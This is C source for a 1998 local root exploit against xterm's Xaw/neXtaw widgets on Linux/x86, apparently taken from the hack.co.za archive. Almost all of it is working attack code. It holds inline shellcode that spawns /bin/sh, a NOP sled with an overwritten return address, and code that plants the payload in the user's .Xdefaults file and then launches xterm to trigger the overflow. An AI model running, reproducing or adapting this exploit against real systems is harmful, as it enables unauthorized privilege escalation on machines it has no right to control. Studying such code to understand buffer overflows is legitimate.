/* xterm_exp.c : linux/x86 xterm.Xaw exploit by alcuin - 5/4/98 - It works against both Xaw and neXtaw widgets NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to use xterm again. */ #include #include #include unsigned int getsp() { asm("mov %esp,%eax"); } inline rootshell() { __asm__( "movb $0x56, %al\n\t" "l1:cmpb $0x12, %al\n\t" "je l2\n\t" "movb $0x12,%al\n\t" "call l1\n\t" "l2:pop %esi\n\t" "xorl %eax,%eax\n\t" "movb $0x25, %al\n\t" "addl %eax,%esi\n\t" "movl %esi,%ebx\n\t" "movl %esi,%edi\n\t" "movb $8,%al\n\t" "addl %eax,%edi\n\t" "movb $5,%al\n\t" "addl %eax,%esi\n\t" "movl %esi,(%edi)\n\t" "movl %edi,%ecx\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "xorb %al,%al\n\t" "movl %eax,(%edi)\n\t" "movl %edi,%edx\n\t" "movb $0xb,%al\n\t" "int $0x80\n\t" ".string \"/bin/sh\"\n" ); } #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" main (int argc, char **argv) { char *home; FILE *f_in, *f_out; char buf[16384]; char shellbuf[16384]; char *s; int i; unsigned int sp=getsp(); if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buf,16384,f_in); for (s=buf;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buf,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; /* write the return adress */ s = shellbuf+2052; *(int *)s=sp+0x69F5; /* write the root shell code */ s = shellbuf+2800; strcpy(s,(char*)rootshell); fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } /* www.hack.co.za [2000]*/